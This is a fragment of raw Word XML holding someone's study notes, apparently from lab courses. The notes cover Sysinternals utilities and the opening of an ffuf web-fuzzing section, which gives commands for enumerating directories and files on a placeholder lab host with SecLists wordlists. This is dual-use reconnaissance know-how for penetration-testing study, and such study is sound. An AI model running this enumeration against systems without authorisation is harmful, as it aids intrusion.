    <w:p w14:paraId="5F120C43" w14:textId="1DD4BF3A" w:rsidR="00632976" w:rsidRPr="0084205E" w:rsidRDefault="00632976" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>DosDevices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05B8D483" w14:textId="319754E5" w:rsidR="00632976" w:rsidRPr="0084205E" w:rsidRDefault="00632976" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Session 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A09CC0" w14:textId="6B56654C" w:rsidR="00632976" w:rsidRPr="0084205E" w:rsidRDefault="00632976" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>WindowStations</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C790706" w14:textId="5DFFED5E" w:rsidR="00632976" w:rsidRPr="0084205E" w:rsidRDefault="00632976" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Compare information with Process Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4208C3" w14:textId="2FE3ABEF" w:rsidR="00632976" w:rsidRPr="0084205E" w:rsidRDefault="00632976" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Miscellaneous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C47C910" w14:textId="00329E57" w:rsidR="00632976" w:rsidRPr="0084205E" w:rsidRDefault="00632976" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>BgInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="30F11CDD" w14:textId="0DCC16AF" w:rsidR="00632976" w:rsidRPr="0084205E" w:rsidRDefault="00632976" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">displays relevant info about </w:t>
      </w:r>
      <w:r w:rsidR="002844A4" w:rsidRPr="0084205E">
        <w:t>Windows computer on desktop background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698EF324" w14:textId="6AD101F2" w:rsidR="002844A4" w:rsidRPr="0084205E" w:rsidRDefault="002844A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">name, IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>, service pack version, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F448037" w14:textId="680020EB" w:rsidR="002844A4" w:rsidRPr="0084205E" w:rsidRDefault="002844A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>handy when managing multiple machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FBB51B" w14:textId="67DFF1AB" w:rsidR="002844A4" w:rsidRPr="0084205E" w:rsidRDefault="002844A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>useful for RDPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15471AF8" w14:textId="65F24877" w:rsidR="002844A4" w:rsidRPr="0084205E" w:rsidRDefault="002844A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>RegJump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1AD2FBC9" w14:textId="60FC12B0" w:rsidR="002844A4" w:rsidRPr="0084205E" w:rsidRDefault="002844A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>takes a registry path and makes Regedit open to that path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4165C31B" w14:textId="710AAADE" w:rsidR="002844A4" w:rsidRPr="0084205E" w:rsidRDefault="002844A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>prevents need to manually navigate Registry via Registry Editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414A0D72" w14:textId="6629AEA8" w:rsidR="002844A4" w:rsidRPr="0084205E" w:rsidRDefault="002844A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681E4CC1" w14:textId="36BCAFF6" w:rsidR="002844A4" w:rsidRPr="0084205E" w:rsidRDefault="002844A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>scans file for UNICODE or ASCII strings of a default length (3+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB743FC" w14:textId="0D7A7011" w:rsidR="002844A4" w:rsidRPr="0084205E" w:rsidRDefault="002844A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">strings &lt;file&gt; | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00391254" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00391254" w:rsidRPr="0084205E">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00391254" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;string&gt;*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D29F8A5" w14:textId="43C8B312" w:rsidR="00391254" w:rsidRPr="0084205E" w:rsidRDefault="00391254" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058A9DB9" w14:textId="1390AAC0" w:rsidR="00391254" w:rsidRPr="0084205E" w:rsidRDefault="00391254" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ProcExp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FF333CF" w14:textId="013915EC" w:rsidR="00391254" w:rsidRPr="0084205E" w:rsidRDefault="00391254" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ProcMon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="060A9CEF" w14:textId="4486670F" w:rsidR="00391254" w:rsidRPr="0084205E" w:rsidRDefault="00391254" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ProcDump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="732C85EF" w14:textId="68AA45B5" w:rsidR="00391254" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId68" w:history="1">
        <w:r w:rsidR="00391254" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=A_TPZxuTzBU</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1BCE8575" w14:textId="43F2A242" w:rsidR="00391254" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId69" w:history="1">
        <w:r w:rsidR="00391254" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=vW8eAqZyWeo</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0CAAD165" w14:textId="33F21003" w:rsidR="00391254" w:rsidRPr="0084205E" w:rsidRDefault="00391254" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C3D0E1A" w14:textId="27E8883A" w:rsidR="00391254" w:rsidRDefault="006E3E92" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SSRF, XXE, Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBEE1C1" w14:textId="1BE763EF" w:rsidR="002A4B64" w:rsidRDefault="002A4B64" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16F191DB" w14:textId="4C7543B8" w:rsidR="002A4B64" w:rsidRDefault="002A4B64" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="450ED41D" w14:textId="64EC3300" w:rsidR="002A4B64" w:rsidRDefault="002A4B64" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="546D785E" w14:textId="104C90AC" w:rsidR="002A4B64" w:rsidRDefault="002A4B64" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6456DDBD" w14:textId="738591E5" w:rsidR="002A4B64" w:rsidRDefault="002A4B64" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="663AF028" w14:textId="2A77E5DC" w:rsidR="002A4B64" w:rsidRDefault="00DC6CBD" w:rsidP="002A4B64">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B9EB62" w14:textId="60A6F797" w:rsidR="00DC6CBD" w:rsidRDefault="00544BE7" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId70" w:anchor="installation" w:history="1">
        <w:r w:rsidR="00DC6CBD" w:rsidRPr="00115359">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/ffuf/ffuf#installation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="698CDD4C" w14:textId="3C75A120" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SecLists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="07B32F81" w14:textId="2838A1AC" w:rsidR="00DC6CBD" w:rsidRDefault="00544BE7" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId71" w:anchor="install" w:history="1">
        <w:r w:rsidR="00DC6CBD" w:rsidRPr="00115359">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/danielmiessler/SecLists#install</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="670DA210" w14:textId="4D37812A" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5543816C" w14:textId="45820EFF" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298636A9" w14:textId="695F18A2" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-u specifies URL and -w specifies wordlist path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0040EC67" w14:textId="04EBEB91" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>default keyword FUZZ points to where wordlist entries are injected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B8D072" w14:textId="29256689" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId72" w:history="1">
        <w:r w:rsidRPr="00115359">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://MACHINE_IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D6E8418" w14:textId="1D342DE5" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can also use custom keyword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D17737" w14:textId="687B645D" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t xml:space="preserve"> -u http://MACHINE_IP/NORAJ -w </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t>seclists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t>/Discovery/Web-Content/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t>big.txt:NORAJ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="60C628C9" w14:textId="52A5C642" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Finding Pages and Directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB3BC27" w14:textId="7572F320" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>start enumerating with a generic list of files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E61752" w14:textId="53EC4618" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC6CBD">
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId73" w:history="1">
        <w:r w:rsidRPr="00115359">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://MACHINE_IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3090C84B" w14:textId="627C2401" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>try for common extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7E1494" w14:textId="1094537A" w:rsidR="00DC6CBD" w:rsidRDefault="00DC6CBD" w:rsidP="00DC6CBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
